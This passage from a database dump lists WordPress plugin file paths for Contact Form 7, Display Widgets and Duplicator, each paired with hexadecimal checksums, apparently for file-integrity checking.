(0x6b46a867cbe9082ea2901f1a1b5f2be1, 'wp-content/plugins/contact-form-7/languages/wpcf7-ckb.mo', 1, 0x00000000000000000000000000000000, 0xc2e5073d188bc1880fe4004d410b5ed4),
(0x2015bd5ee91471aa007f4bff998554c7, 'wp-content/plugins/contact-form-7/languages/wpcf7-cs_CZ.mo', 1, 0x00000000000000000000000000000000, 0xd289cdb9ace3c4facb05b07652cbfa0a),
(0xd84037ba1a9f131e3af95850d64a0d79, 'wp-content/plugins/contact-form-7/languages/wpcf7-da_DK.mo', 1, 0x00000000000000000000000000000000, 0x9b3ed1565ad222a3ba2fdb6d722d6702),
(0x750775bef7ea4535ff8a457aeb0b1bbe, 'wp-content/plugins/contact-form-7/languages/wpcf7-de_DE.mo', 1, 0x00000000000000000000000000000000, 0x2dfc77d694b2c7c891434ba1b5d57fd4),
(0xca5c0fa6e6f94ba3b0cab0cc33740a3b, 'wp-content/plugins/contact-form-7/languages/wpcf7-el.mo', 1, 0x00000000000000000000000000000000, 0x324401f1c39894bdaa9ec237b14a058e),
(0x1aa7c19f0d16765eb93b93676cbff9fa, 'wp-content/plugins/contact-form-7/languages/wpcf7-eo_EO.mo', 1, 0x00000000000000000000000000000000, 0xd1ec1cdfbace96a92a8a7eb72bb71058),
(0xc395982982cc9687964f43c023f2bc5d, 'wp-content/plugins/contact-form-7/languages/wpcf7-es_ES.mo', 1, 0x00000000000000000000000000000000, 0xa099af4f8562300c3053b3f735b210ae),
(0xf6736bf5a7b555a19e608bf75224c140, 'wp-content/plugins/contact-form-7/languages/wpcf7-et.mo', 1, 0x00000000000000000000000000000000, 0x98a5351554f2c8fc9149034eb9a95a3b),
(0x72e35d0aeeee7350b9f965c69bb6d8c2, 'wp-content/plugins/contact-form-7/languages/wpcf7-eu.mo', 1, 0x00000000000000000000000000000000, 0xd95d2c5ca945f169342670b920417bcc),
(0xe77912c253e8416f25afd917df1a9b0e, 'wp-content/plugins/contact-form-7/languages/wpcf7-fa_IR.mo', 1, 0x00000000000000000000000000000000, 0x215818d356efc5a748201c1d84686c02),
(0x60dcb07c2af83c2c4cbf955f811dee48, 'wp-content/plugins/contact-form-7/languages/wpcf7-fi.mo', 1, 0x00000000000000000000000000000000, 0x92cc5fe00aeab21655c3efa24d2a60b8),
(0x2f4772f09dc384a4ee5396000a8e0559, 'wp-content/plugins/contact-form-7/languages/wpcf7-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0x0599800dda4e902dcb615585ba9d9045),
(0x16dc82e5b625ba00702a62615a489b98, 'wp-content/plugins/contact-form-7/languages/wpcf7-ga_IE.mo', 1, 0x00000000000000000000000000000000, 0xccb22d5c0e099f2db993975bf47a65be),
(0x4a10f25ad4122676211db7ce7eb268af, 'wp-content/plugins/contact-form-7/languages/wpcf7-gl_ES.mo', 1, 0x00000000000000000000000000000000, 0x80b3203ca5a8cd3836da4c4021e00987),
(0xaf18f310e1d88ef5dde645989089acee, 'wp-content/plugins/contact-form-7/languages/wpcf7-gu_IN.mo', 1, 0x00000000000000000000000000000000, 0x90ea94f8609690f482bd47eb0b43286f),
(0x25cbc8146f8699b006b30ac583bc2978, 'wp-content/plugins/contact-form-7/languages/wpcf7-he_IL.mo', 1, 0x00000000000000000000000000000000, 0x856e2a2f2dcb6ed0dd60e47d2bd0bf15),
(0x521260f65bb0653f3242e7e2a87b9498, 'wp-content/plugins/contact-form-7/languages/wpcf7-hi_IN.mo', 1, 0x00000000000000000000000000000000, 0xe87618943b003cb13a8d694772d7ec63),
(0x2e0114ff651499efd4dd9d8e1c0977a3, 'wp-content/plugins/contact-form-7/languages/wpcf7-hr.mo', 1, 0x00000000000000000000000000000000, 0xe43e73d6a6c55525a23f435175dd3be6),
(0x50ca21934289d3012347dd7f61129cbb, 'wp-content/plugins/contact-form-7/languages/wpcf7-hu_HU.mo', 1, 0x00000000000000000000000000000000, 0x1a6f2538661b85c0e5ee7fc940e3afe3),
(0xcad544cdeda34308026a230831118afb, 'wp-content/plugins/contact-form-7/languages/wpcf7-hy_AM.mo', 1, 0x00000000000000000000000000000000, 0x671e1fb351cfbc541d8d75db6b251e40),
(0x5c90b20fcb987518a85685fc891b9cc2, 'wp-content/plugins/contact-form-7/languages/wpcf7-id_ID.mo', 1, 0x00000000000000000000000000000000, 0x926e1fb9693f3f0267548249272961a7),
(0x9a992c829dcb7d07eeaa17cc910414bc, 'wp-content/plugins/contact-form-7/languages/wpcf7-it_IT.mo', 1, 0x00000000000000000000000000000000, 0x9bf83d19ae822d077d56d98bc6edc1e9),
(0xedea0a2fc932720ff9128cb79a29b566, 'wp-content/plugins/contact-form-7/languages/wpcf7-ja.mo', 1, 0x00000000000000000000000000000000, 0xfeebb60bdc398e9962a2efb3fbb6e268),
(0xa8b06fd5b3143f7b4005a48593627a8d, 'wp-content/plugins/contact-form-7/languages/wpcf7-ka_GE.mo', 1, 0x00000000000000000000000000000000, 0x168c710276cd527cc83127d160728efe),
(0x7507237af80a5f4dffcb9a0327740adf, 'wp-content/plugins/contact-form-7/languages/wpcf7-ko_KR.mo', 1, 0x00000000000000000000000000000000, 0xb48ac45a6aa67b55bda70aa217b05ce9),
(0x7538900cfe3fb3a8662abd520ae2c8c8, 'wp-content/plugins/contact-form-7/languages/wpcf7-lt_LT.mo', 1, 0x00000000000000000000000000000000, 0xbf248aed1ea3c6d885a3ecd957a004ac),
(0x72d25cd34b8fd49b9bda34633d34aacd, 'wp-content/plugins/contact-form-7/languages/wpcf7-lv.mo', 1, 0x00000000000000000000000000000000, 0xb1e0782bd88da1b7dfaf9c28fb615618),
(0xc926e4c0eb23da18d2420496b1d18b03, 'wp-content/plugins/contact-form-7/languages/wpcf7-mk_MK.mo', 1, 0x00000000000000000000000000000000, 0xa99b18318a91213cefac5abb25b55e55),
(0x3f1b4d330fce46edfeff9bd755277e53, 'wp-content/plugins/contact-form-7/languages/wpcf7-ml_IN.mo', 1, 0x00000000000000000000000000000000, 0x2eb2a6ec77620960a6c8127bb093af2c),
(0xcdbc25bf945f45711151dbd0f26c997b, 'wp-content/plugins/contact-form-7/languages/wpcf7-ms_MY.mo', 1, 0x00000000000000000000000000000000, 0xf3920fac0590308c6debe186a1ee7a77),
(0x5af1d2e030873f04c0cfcd8afd652a30, 'wp-content/plugins/contact-form-7/languages/wpcf7-mt_MT.mo', 1, 0x00000000000000000000000000000000, 0x69c3211182c6b5ddab48d67f8cbf58c2),
(0x54f174f7e489ff0f936a6c520c8ff183, 'wp-content/plugins/contact-form-7/languages/wpcf7-nb_NO.mo', 1, 0x00000000000000000000000000000000, 0xb66739ffe7d7a0d3dd4a95f61177dec2),
(0x30400348a3d58d0b0d5a83bce2109378, 'wp-content/plugins/contact-form-7/languages/wpcf7-nl_NL.mo', 1, 0x00000000000000000000000000000000, 0xe1267911732eaf6dc420d9afe1c9d34e),
(0xd3a87a0b2779554ee2d46e40b53b77ef, 'wp-content/plugins/contact-form-7/languages/wpcf7-pl_PL.mo', 1, 0x00000000000000000000000000000000, 0x80215d816b20cd1d0b1fe1b7e15240f8),
(0x79f9f62f685cbab5dcb672539964324a, 'wp-content/plugins/contact-form-7/languages/wpcf7-pt_BR.mo', 1, 0x00000000000000000000000000000000, 0x66042af99778dc358d0367723833baae),
(0x50a0f735de096114b634da02bc067611, 'wp-content/plugins/contact-form-7/languages/wpcf7-pt_PT.mo', 1, 0x00000000000000000000000000000000, 0x2b179846d8e1bde0a1eca7f60f402b57),
(0xf2c47a9684022e1578b0716c4c13c98b, 'wp-content/plugins/contact-form-7/languages/wpcf7-ro_RO.mo', 1, 0x00000000000000000000000000000000, 0x54860f16afab7b8dbcbe08689e2a6db0),
(0xaa5f83f4f30dca07fc1c518d4868fc87, 'wp-content/plugins/contact-form-7/languages/wpcf7-ru_RU.mo', 1, 0x00000000000000000000000000000000, 0x45fe6fb13c1b9cd4ee1d9144bd6aebc9),
(0x74ba9f4fce337658ef553eeef51b530b, 'wp-content/plugins/contact-form-7/languages/wpcf7-si_LK.mo', 1, 0x00000000000000000000000000000000, 0xb14920a2ac3a10b377f99bcc35e6dabf),
(0xf0a5fb3538db3ff197671b3b0e8877ca, 'wp-content/plugins/contact-form-7/languages/wpcf7-sk_SK.mo', 1, 0x00000000000000000000000000000000, 0xd9131a6ad66e50002aad8486df7e1c26),
(0xc4cbaf52e711be26d4955c2bf8c4e871, 'wp-content/plugins/contact-form-7/languages/wpcf7-sl_SI.mo', 1, 0x00000000000000000000000000000000, 0x08b1113b4433b61ba1537f9388030fbf),
(0xc1b40d15a3dda727012e0eece748cc8e, 'wp-content/plugins/contact-form-7/languages/wpcf7-sq.mo', 1, 0x00000000000000000000000000000000, 0x2eb62c98bb72d6fecd9c16ff7cd381c7),
(0xacb0275b6cf69f8afd30e6be7ab6dab0, 'wp-content/plugins/contact-form-7/languages/wpcf7-sr_RS.mo', 1, 0x00000000000000000000000000000000, 0x5465955d16f1b65c49b68f63aa36cbe1),
(0x75ec990a8f4e7c450c7e514b95542e11, 'wp-content/plugins/contact-form-7/languages/wpcf7-sv_SE.mo', 1, 0x00000000000000000000000000000000, 0xecde8d6def6a48e7abd494aea7443554),
(0x1c3995dfa50ca86dea26ad696a5f781a, 'wp-content/plugins/contact-form-7/languages/wpcf7-ta.mo', 1, 0x00000000000000000000000000000000, 0xfb20bae56796b982d218cb2f355542e8),
(0x731b4cb980d3f1b8ed86be8f61e5a862, 'wp-content/plugins/contact-form-7/languages/wpcf7-th.mo', 1, 0x00000000000000000000000000000000, 0xffcd580ea4151a3055274056e6ed346a),
(0x520a0b8902ca9fb5b6313ac788108db9, 'wp-content/plugins/contact-form-7/languages/wpcf7-tl.mo', 1, 0x00000000000000000000000000000000, 0xe35dbf58ed7264e89b1402676eab8e08),
(0xc01600d5d9c4ad7e8a577c04e18e854c, 'wp-content/plugins/contact-form-7/languages/wpcf7-tr_TR.mo', 1, 0x00000000000000000000000000000000, 0x3d8bedcd7b4cbde5350c7bffd177c5af),
(0x452e608dd72ef42478013bfe9dbf54c2, 'wp-content/plugins/contact-form-7/languages/wpcf7-uk.mo', 1, 0x00000000000000000000000000000000, 0x4a5c3fa810fda8ac334c68aba6e2711b),
(0x482df31e8ac62dcdbb0a8fb0c0f8fd9c, 'wp-content/plugins/contact-form-7/languages/wpcf7-vi.mo', 1, 0x00000000000000000000000000000000, 0x8577d8a5c332f410f2f1b72a5f79afde),
(0x168081af00ee4275906c12cd3e4e9077, 'wp-content/plugins/contact-form-7/languages/wpcf7-zh_CN.mo', 1, 0x00000000000000000000000000000000, 0xaf11a00be57ad44fe14728205b5f28d0),
(0xf9572c5eec8ebcd24a01577be18f00c1, 'wp-content/plugins/contact-form-7/languages/wpcf7-zh_TW.mo', 1, 0x00000000000000000000000000000000, 0x765c364a9267baf14f74c5adbcf8d6e2),
(0xf1730aa54b5fc76af15009c7be7e8ac9, 'wp-content/plugins/contact-form-7/languages/wpcf7.pot', 1, 0x00000000000000000000000000000000, 0x6e1562d30c2357c2d5209586e2a61a1d),
(0xdd8bbc726e7da77ab90ce47727e91d08, 'wp-content/plugins/contact-form-7/license.txt', 1, 0x00000000000000000000000000000000, 0xb234ee4d69f5fce4486a80fdaf4a4263),
(0x8061c4c8046e46682023db88f58df1bc, 'wp-content/plugins/contact-form-7/modules/acceptance.php', 1, 0x00000000000000000000000000000000, 0x34b733de7b73ce697e8f9464dfe542dc),
(0xecc6bfad8ef995e66fee8d46d76894e3, 'wp-content/plugins/contact-form-7/modules/akismet.php', 1, 0x00000000000000000000000000000000, 0x5e62a1795505dd4ae1a582e8a49efaa4),
(0x9fd32e3aa5fd27ccf6f5dd3ce7f97176, 'wp-content/plugins/contact-form-7/modules/captcha.php', 1, 0x00000000000000000000000000000000, 0x75ce6576e7b0d4dab5cf56780128466c),
(0x0d766bbd502dc8748db8479aa5a6486d, 'wp-content/plugins/contact-form-7/modules/checkbox.php', 1, 0x00000000000000000000000000000000, 0x47e02026776ad44ab112da7e12847ff6),
(0x0013df4075189ca59c3205b6ee58e7b6, 'wp-content/plugins/contact-form-7/modules/date.php', 1, 0x00000000000000000000000000000000, 0xcc255e6f97aa4e96512c89bfc7d00dfb),
(0x1214594945f9e25474324cd5181ee85d, 'wp-content/plugins/contact-form-7/modules/file.php', 1, 0x00000000000000000000000000000000, 0x42be2a9a598e523b400219b6da21da8b),
(0x7802f33ed31c9de6455cb095513b9a5c, 'wp-content/plugins/contact-form-7/modules/flamingo.php', 1, 0x00000000000000000000000000000000, 0x64c7cedc5714870e69bee33aa3acfdcf),
(0x61bd54f2edf452456d0573217975bc3a, 'wp-content/plugins/contact-form-7/modules/jetpack.php', 1, 0x00000000000000000000000000000000, 0x309a8da7b704dc9005b91167f9eb0eab),
(0x6b09bba7da3ced992847da77f4db1682, 'wp-content/plugins/contact-form-7/modules/number.php', 1, 0x00000000000000000000000000000000, 0x689cc8a16e96e2f4a52486312957e28d),
(0xc345858a65e4225e16b8fa7a54ee89c7, 'wp-content/plugins/contact-form-7/modules/quiz.php', 1, 0x00000000000000000000000000000000, 0x29944c76b1c7d94d67e0ff3babdce384),
(0x5c0af13b3ac649d122ef40ef4f68c915, 'wp-content/plugins/contact-form-7/modules/response.php', 1, 0x00000000000000000000000000000000, 0xcdc9422174c283e89423ecda50d7a02f),
(0xddba243b6bd9c24a95098f61806c31a3, 'wp-content/plugins/contact-form-7/modules/select.php', 1, 0x00000000000000000000000000000000, 0x840b38b7ee7cb8f2c8e310b7a094e24c),
(0xb0869305565b252795fdb3f1c5be99ce, 'wp-content/plugins/contact-form-7/modules/special-mail-tags.php', 1, 0x00000000000000000000000000000000, 0xf12a62f635d11c491d74bb1de7c2bd19),
(0x4a3ff8ab34ad598b9568890b65213e4f, 'wp-content/plugins/contact-form-7/modules/submit.php', 1, 0x00000000000000000000000000000000, 0xa509a33d2e52704c93bfa9128b0d1054),
(0x1b62c7084e3dbfb010a82cc0c653ede0, 'wp-content/plugins/contact-form-7/modules/text.php', 1, 0x00000000000000000000000000000000, 0x05f823658546bb08c755ba4a8012a67a),
(0xfd72b022b72da500a04598770289a258, 'wp-content/plugins/contact-form-7/modules/textarea.php', 1, 0x00000000000000000000000000000000, 0x4c4825afd781b0e35f0aabd46b0adecf),
(0xa4a18318366f38188a86a54e0c6f4c3b, 'wp-content/plugins/contact-form-7/readme.txt', 1, 0x00000000000000000000000000000000, 0xe0f3aa5d99f0ebf28184ede3422e40e2),
(0xa025df260be0bfc50c7d701d5c3fdb81, 'wp-content/plugins/contact-form-7/settings.php', 1, 0x00000000000000000000000000000000, 0xaaaa78c2ff882864deed17f3969e1081),
(0x0de2afc2b6324f93de328187fa26a640, 'wp-content/plugins/contact-form-7/uninstall.php', 1, 0x00000000000000000000000000000000, 0x61be2af9e9463a04d3140773e39e7bee),
(0x6b4e98eb286cab5a669d8445224c6dc9, 'wp-content/plugins/contact-form-7/wp-contact-form-7.php', 1, 0x00000000000000000000000000000000, 0x0bc57d68b9a2773d058c97bb56d71d6b),
(0xe44837ce5a031f093189c0ae051ccee1, 'wp-content/plugins/display-widgets/display-widgets.php', 1, 0x00000000000000000000000000000000, 0x1e26acd99443dfc22d49cc7ecd713ffd),
(0xedc64f110228bda43b0587012a24e279, 'wp-content/plugins/display-widgets/languages/display-widgets-TL.mo', 1, 0x00000000000000000000000000000000, 0x5bc5e4afe91da5e03c481df3f5788eb7),
(0x58f54b10632ba7f02e15bdda78e6a82f, 'wp-content/plugins/display-widgets/languages/display-widgets-TL.po', 1, 0x00000000000000000000000000000000, 0xabf125fd7ad42b119a1b63bb5d4be620),
(0x1f2513e49725bc43dddecb68db85a031, 'wp-content/plugins/display-widgets/languages/display-widgets-bm_MY.mo', 1, 0x00000000000000000000000000000000, 0xe8ebf8a2c064160359f65e403f8bf4c9),
(0xc9e27a719d3eff452311ab062904792b, 'wp-content/plugins/display-widgets/languages/display-widgets-bm_MY.po', 1, 0x00000000000000000000000000000000, 0x59af1adc536690cf609ad73226d8fd2f),
(0xb407ecb4840319b0cad6d801e54c537a, 'wp-content/plugins/display-widgets/languages/display-widgets-de_DE.mo', 1, 0x00000000000000000000000000000000, 0x3b72c1d8ed76a2dd8d2c22d7d3b1de65),
(0xf868c03b44d4b6b0727974b2571ab396, 'wp-content/plugins/display-widgets/languages/display-widgets-de_DE.po', 1, 0x00000000000000000000000000000000, 0x2c216331407657d09280320e3f7aa44f),
(0x0b7b820a6de044d864f853dda4e5231e, 'wp-content/plugins/display-widgets/languages/display-widgets-en_US.po', 1, 0x00000000000000000000000000000000, 0x3f66e78a03caf1ef0bf4ebe90e820862),
(0x998c6c96365407ebb4dd6f990fbc83c3, 'wp-content/plugins/display-widgets/languages/display-widgets-es_ES.mo', 1, 0x00000000000000000000000000000000, 0x744995620e349ec280c52e9bd371476d),
(0x979eb3ee724cda45470df78b0bbafa34, 'wp-content/plugins/display-widgets/languages/display-widgets-es_ES.po', 1, 0x00000000000000000000000000000000, 0x1c0cb520bdcfa49b11f26dc642020f47),
(0x01220cefca3ed8cd0606c561fb9f009c, 'wp-content/plugins/display-widgets/languages/display-widgets-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0xe56bae12ba940101b6fe029ffc4311df),
(0x55a4516aa93311408ffd975aad206d45, 'wp-content/plugins/display-widgets/languages/display-widgets-fr_FR.po', 1, 0x00000000000000000000000000000000, 0xfe6047602fa2066a9e457b56ee570a84),
(0xd2b273354b78b78260bf39a53603e359, 'wp-content/plugins/display-widgets/languages/display-widgets-he_IL.mo', 1, 0x00000000000000000000000000000000, 0x7dda9e9e065211a4d3ef5fe00c20634d),
(0x03531d6c3ab021fa1a455e8d08c914bc, 'wp-content/plugins/display-widgets/languages/display-widgets-he_IL.po', 1, 0x00000000000000000000000000000000, 0x717ad8e19f5860fd21776d97429945f5),
(0x5ff0ef8e25b442e93271af3644e94cee, 'wp-content/plugins/display-widgets/languages/display-widgets-ja.mo', 1, 0x00000000000000000000000000000000, 0x5a07571d63fb519fd162c6e1753ce305),
(0x53487c4a2a242acba4004f9532ac1b03, 'wp-content/plugins/display-widgets/languages/display-widgets-ja.po', 1, 0x00000000000000000000000000000000, 0x0623039c76a00551b4bc29a77c1fb08a),
(0x17f511c957c100df8c6babe99b684e2e, 'wp-content/plugins/display-widgets/languages/display-widgets-nl_NL.mo', 1, 0x00000000000000000000000000000000, 0x37855949d4658c1b2a6e34c21b7193c7),
(0xa26fc0b430df1f887dabe8edf6bf2c4b, 'wp-content/plugins/display-widgets/languages/display-widgets-nl_NL.po', 1, 0x00000000000000000000000000000000, 0x77c1222d9476111d31c71a1094b2388e),
(0x860515e67449ae86389f8e97e277ad35, 'wp-content/plugins/display-widgets/languages/display-widgets-pl_PL.mo', 1, 0x00000000000000000000000000000000, 0x4b3d18f834416a0fba492da788770cfe),
(0x82ea53b9b9031bd880220473f203c18c, 'wp-content/plugins/display-widgets/languages/display-widgets-pl_PL.po', 1, 0x00000000000000000000000000000000, 0x078a6e56c200419442eb53e99222afaf),
(0xce6ceb25243e54bdc9d7b2134ff69395, 'wp-content/plugins/display-widgets/languages/display-widgets-ro_RO.mo', 1, 0x00000000000000000000000000000000, 0x3fba61cea85a9ed4e2864ecd4cd0d53a),
(0x23b8d75246b7bade76c442fc3348e7b2, 'wp-content/plugins/display-widgets/languages/display-widgets-ro_RO.po', 1, 0x00000000000000000000000000000000, 0xc9d5cff1bef1358a34345355e94ca165),
(0x1087901594831aef045b5c5d473e140b, 'wp-content/plugins/display-widgets/languages/display-widgets-ru_RU.mo', 1, 0x00000000000000000000000000000000, 0x72dc9b50c4d8952fe5edbca09387575a),
(0x254cc33dc5a12128aef66160d6e31831, 'wp-content/plugins/display-widgets/languages/display-widgets-ru_RU.po', 1, 0x00000000000000000000000000000000, 0x3d0e316af47349e3130248390d89062c),
(0x36cf3e8aa59c51cddc111b271348c600, 'wp-content/plugins/display-widgets/languages/display-widgets-sq_AL.mo', 1, 0x00000000000000000000000000000000, 0xf8e8d72c2f93d298fe2e28ce7f351526),
(0x4ef520f6214cc9b78cfb61b5a0d0733d, 'wp-content/plugins/display-widgets/languages/display-widgets-sq_AL.po', 1, 0x00000000000000000000000000000000, 0xa69058f5f655969dd513e1e3e05b23d7),
(0xc1be8668df365705902c0db2f15120db, 'wp-content/plugins/display-widgets/languages/display-widgets-zh_CN.mo', 1, 0x00000000000000000000000000000000, 0x43c6becb83197d315d4d6f94b7be5b82),
(0x3a40586b27521e75b99aa58cf7bcb29c, 'wp-content/plugins/display-widgets/languages/display-widgets-zh_CN.po', 1, 0x00000000000000000000000000000000, 0xd60ce8bf2d93e50ee3bb84b11d7bb0a4),
(0xc233826b186682af50053cad70408476, 'wp-content/plugins/display-widgets/readme.txt', 1, 0x00000000000000000000000000000000, 0x56b7358dbec8e538abdf387e855a1402),
(0xc64e195823c0fd0a272f9b8ccbb4184c, 'wp-content/plugins/display-widgets/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0xcea330d505e3b86ade7932d1f2105e03),
(0x8ff7311e03fe7b9761caff0cd12cb9a0, 'wp-content/plugins/duplicator/assets/css/font-awesome.min.css', 1, 0x00000000000000000000000000000000, 0xaede50e4be8da8450a046f9d293e57a5),
(0x0d72c7b569a701f30d3275bc31cd9324, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_flat_0_aaaaaa_40x100.png', 1, 0x00000000000000000000000000000000, 0x2a44fbdb7360c60122bcf6dcef0387d8),
(0xd8e6d290446fbdd03d28e1b953f07b66, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_flat_75_ffffff_40x100.png', 1, 0x00000000000000000000000000000000, 0x8692e6efddf882acbff144c38ea7dfdf),
(0xb3d51ef039e438cda4abebf546fa2477, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_55_fbf9ee_1x400.png', 1, 0x00000000000000000000000000000000, 0xf8f4558e0b92ff2cd6136781533902ec),
(0xa9f2da50cc08fef278aeaa9f0b0ea25f, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_65_ffffff_1x400.png', 1, 0x00000000000000000000000000000000, 0xe5a8f32e28fd5c27bf0fed33c8a8b9b5),
(0xa9080c96e42391d6fd9fe71f47aadb05, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_75_dadada_1x400.png', 1, 0x00000000000000000000000000000000, 0xc12c6510dad3ebfa64c8a30e959a2469),
(0x0ecfcb4b52f23cc382f1a88581528e42, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_75_e6e6e6_1x400.png', 1, 0x00000000000000000000000000000000, 0xf4254356c2a8c9a383205ef2c4de22c4),
(0x8c4f4e35859a64baeaddb9d7fa20d2c9, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_glass_95_fef1ec_1x400.png', 1, 0x00000000000000000000000000000000, 0xfb99b0d4d2f0b82a6fa65deeef120163),
(0x512eae8fc5455879faff3c8bc9805cb0, 'wp-content/plugins/duplicator/assets/css/images/ui-bg_highlight-soft_75_cccccc_1x100.png', 1, 0x00000000000000000000000000000000, 0x72c593d16e998952cd8d798fee33c6f3),
(0x8e8c11e101d51d17c99cbc11478ac226, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_222222_256x240.png', 1, 0x00000000000000000000000000000000, 0xebe6b6902a408fbf9cac6379a1477525),
(0x65b2f991fbcaf72af36921c565cd5a03, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_2e83ff_256x240.png', 1, 0x00000000000000000000000000000000, 0x6e7a87edf112d7544015589f8291e752),
(0x74d3c478942ad66edd981c26d892f582, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_454545_256x240.png', 1, 0x00000000000000000000000000000000, 0x119dd0c2e94ad689de873ef39fd43e6e),
(0x181ba438aa24e55d9b38be7f45d93906, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_888888_256x240.png', 1, 0x00000000000000000000000000000000, 0x9c46d7cab43e22a14bad26d2d4806d80),
(0xa221a99c9348e0164d31bf901c823ced, 'wp-content/plugins/duplicator/assets/css/images/ui-icons_cd0a0a_256x240.png', 1, 0x00000000000000000000000000000000, 0x3e450c2a2c66328d9498e7001ad7197c),
(0x1f2f0e29735c3b523f56376f1ff38f33, 'wp-content/plugins/duplicator/assets/css/jquery-ui.css', 1, 0x00000000000000000000000000000000, 0xa4670525d5133a3db3cab91742425d1c),
(0xca3042cb235b774975a9ce95b7e4d304, 'wp-content/plugins/duplicator/assets/css/style.css', 1, 0x00000000000000000000000000000000, 0x272baae46b545aec857611dae55da856),
(0x4d2879cc0b837c5c3d1d9d4417260af4, 'wp-content/plugins/duplicator/assets/fonts/FontAwesome.otf', 1, 0x00000000000000000000000000000000, 0x3b15120c304688379525c9f3c15cc4c2),
(0xfa63102558e37e35e25ce2e1065c65a4, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.eot', 1, 0x00000000000000000000000000000000, 0x90186830c9c50a0fed932494581761d9),
(0xec8fec450064ce3c261fadbe0ef416ba, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.svg', 1, 0x00000000000000000000000000000000, 0xdc89f84240347782f3a88e9f4d2d62e7),
(0x3de9ddb264203e536d5b8f30c1f81bb7, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.ttf', 1, 0x00000000000000000000000000000000, 0x4f0022f25672c7f501c339cbf98d9117),
(0x52570c3e30bb1ee0bbbc609478b77a70, 'wp-content/plugins/duplicator/assets/fonts/fontawesome-webfont.woff', 1, 0x00000000000000000000000000000000, 0xfdf491ce5ff5b2da02708cd0e9864719),
(0x63a88b72aa68ffbe3a903bd2cee65c5b, 'wp-content/plugins/duplicator/assets/img/5star.png', 1, 0x00000000000000000000000000000000, 0x8a0e48988c8ea5d6607ce39752e12a28),
(0x0cc81d89b94293c3b78ec5d1ecd66350, 'wp-content/plugins/duplicator/assets/img/create.png', 1, 0x00000000000000000000000000000000, 0xbb45c8ccf38cb86875cf8d3534529b0b),
(0x1048a2196a9279825caf38e3a3bdaa4e, 'wp-content/plugins/duplicator/assets/img/hdivider.png', 1, 0x00000000000000000000000000000000, 0xd93d7ce951a6145db510ddfcd601e803),
(0x35a2c3146794969de8c19f018827c85b, 'wp-content/plugins/duplicator/assets/img/logo-box.png', 1, 0x00000000000000000000000000000000, 0x535104617eb4ee4f7fa89be2bb9f8a67),
(0x764b3928f29581d23c8fe461c4d4c553, 'wp-content/plugins/duplicator/assets/img/logo.png', 1, 0x00000000000000000000000000000000, 0xfd1744ce04ec5c6523a9ffb8458becfe),
(0x593f392323314487a761dfc8a3f46f3a, 'wp-content/plugins/duplicator/assets/img/paypal.png', 1, 0x00000000000000000000000000000000, 0xfe953cc8f80d353b44733ffb911eba0a),
(0xfa576187e772f75e51cda40b2471f935, 'wp-content/plugins/duplicator/assets/js/parsley-standalone.min.js', 1, 0x00000000000000000000000000000000, 0x851d74cc118c0bf055e7b75054441392),
(0x7e20af35bf6e58a227d975f1747f65ee, 'wp-content/plugins/duplicator/classes/logging.php', 1, 0x00000000000000000000000000000000, 0xfcc2a6e7390f8379c8555498dd3ab223),
(0x4ae06855fa607c0047ff297e27f0c40b, 'wp-content/plugins/duplicator/classes/package.archive.php', 1, 0x00000000000000000000000000000000, 0x000f4f37cda0609e355aa5e35c2233a8),
(0x4c804e39b032c29c18961a68ff798be8, 'wp-content/plugins/duplicator/classes/package.archive.zip.php', 1, 0x00000000000000000000000000000000, 0x1e51293d23e38a3ac4b91a1d0e3a3b5f),
(0x27a7d9f987522a1ee5a5f6e403f1104f, 'wp-content/plugins/duplicator/classes/package.database.php', 1, 0x00000000000000000000000000000000, 0xd1f2ee27e86fcad71e5bd62468aa3121),
(0x56a2bca9ca784a3a663ab2c4804e9f39, 'wp-content/plugins/duplicator/classes/package.installer.php', 1, 0x00000000000000000000000000000000, 0xf66d28565d5913443c22a08aedd36b0a),
(0x886d17c1166dcc5cbe54f75ff76f6e33, 'wp-content/plugins/duplicator/classes/package.php', 1, 0x00000000000000000000000000000000, 0xfb20ff77792b09042a9e5c2503129743),
(0x94d6ab3d39ab6a0b56dced6f637932e5, 'wp-content/plugins/duplicator/classes/server.php', 1, 0x00000000000000000000000000000000, 0xa9a2be3ee447943779f98a57e8b37275),
(0xbc961c8b506cac54d91ee3cd46afed59, 'wp-content/plugins/duplicator/classes/settings.php', 1, 0x00000000000000000000000000000000, 0x04ab433545e719340f90158ceb0b8729),
(0x9f1f4f825cb26f6b6308292f4a7e201a, 'wp-content/plugins/duplicator/classes/ui.php', 1, 0x00000000000000000000000000000000, 0x42c9ceae093ef7d18e207196977ea672),
(0xd9c6d6a8a2b0fa15e9fd0805eaee0b35, 'wp-content/plugins/duplicator/classes/utility.php', 1, 0x00000000000000000000000000000000, 0xcfe31384b8155a0a63b18b19c6272999),
(0xb493278de7ed4ade2d610c78c03f92d4, 'wp-content/plugins/duplicator/define.php', 1, 0x00000000000000000000000000000000, 0xe6019c33165987a597db896596a1d6cc),
(0x2630975e1e15aedb1fa018475994132d, 'wp-content/plugins/duplicator/duplicator.php', 1, 0x00000000000000000000000000000000, 0xe3383c8918e7b4f7d93bf1bef75c2051),
(0x79dff3160e4328fdee04e0b8e2235470, 'wp-content/plugins/duplicator/installer/build/ajax.step1.php', 1, 0x00000000000000000000000000000000, 0xeb947db1767b11e1b017e3eb92f3cb78),
(0xdad0a04c0cc86a511fa544088197c49e, 'wp-content/plugins/duplicator/installer/build/ajax.step2.php', 1, 0x00000000000000000000000000000000, 0x74027d2427e6dbc5a22cc432e3e01028),
(0x5ffce69fa3b391ad434be9999ceb5b30, 'wp-content/plugins/duplicator/installer/build/assets/inc.css.php', 1, 0x00000000000000000000000000000000, 0x8b8230ccf5984c6d8f51302c6cec5b2f),
